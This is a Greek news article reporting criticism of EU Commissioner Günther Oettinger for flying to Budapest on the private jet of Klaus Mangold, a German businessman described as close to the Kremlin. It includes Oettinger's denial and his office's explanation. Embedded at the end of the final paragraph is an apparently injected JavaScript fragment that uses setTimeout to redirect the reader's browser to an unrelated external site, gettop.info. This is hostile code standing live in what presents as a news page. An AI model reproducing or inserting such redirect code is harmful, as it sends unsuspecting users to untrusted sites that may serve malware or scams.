Πυρά κατά Έτινγκερ για ταξίδι με αεροσκάφος φιλορώσου επιχειρηματία

0
7

 

Στο στόχαστρο επικρίσεων βρίσκεται ακόμη μία φορά ο Ευρωπαίος Επίτροπος Γκίντερ Έτινγκερ, έπειτα από ένα δημοσίευμα που αναφέρει ότι χρησιμοποίησε το ιδιωτικό αεροσκάφος φιλορώσου επιχειρηματία για επίσημο ταξίδι του.

«Οι κατηγορίες είναι αβάσιμες», ανέφερε ο Έτινγκερ στον λογαριασμό του στο Twitter, αντιδρώντας στο άρθρο που δημοσιεύθηκε στο EUobserver.

Σύμφωνα με το δημοσίευμα, ο Έτινγκερ χρησιμοποίησε τον περασμένο Μάιο το ιδιωτικό αεροσκάφος του Γερμανού επιχειρηματία Κλάους Μάνγκολντ, που θεωρείται ότι πρόσκειται στο Κρεμλίνο, προκειμένου να ταξιδέψει στην Ουγγαρία.

«Ο επίτροπος Έτινγκερ είχε προσκληθεί από την ουγγρική κυβέρνηση σε μια διάσκεψη. Εξαιτίας του πιεσμένου προγράμματός του δεν μπορούσε να πάρει το αεροπλάνο της γραμμής και να φτάσει στην ώρα του για το δείπνο εργασίας με τον πρωθυπουργό Βίκτορ Ορμπάν», ανέφερε το γραφείο Τύπου του επιτρόπου στο Γαλλικό Πρακτορείο.

«Κατά συνέπεια, η ουγγρική κυβέρνηση πρότεινε ο επίτροπος Έτινγκερ να χρησιμοποιήσει το αεροπλάνο του Κλάους Μάνγκολντ, ο οποίος ταξίδευε επίσης προς τη Βουδαπέστη. Ήταν το μοναδικό μέσο για να φτάσει στην ώρα του στο ραντεβού», πρόσθετε η ανακοίνωση του γραφείου Τύπου.

Σύμφωνα, ωστόσο, με τον Ούγγρο βουλευτή των Πράσινων Μπένεντεκ Γιάβορ, τον οποίο επικαλείται το EUobserver, ο Έτινγκερ μπορούσε να επιλέξει μεταξύ τεσσάρων πτήσεων που συνέδεαν τις Βρυξέλλες με τη Βουδαπέστη στις 18 Μαΐου. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here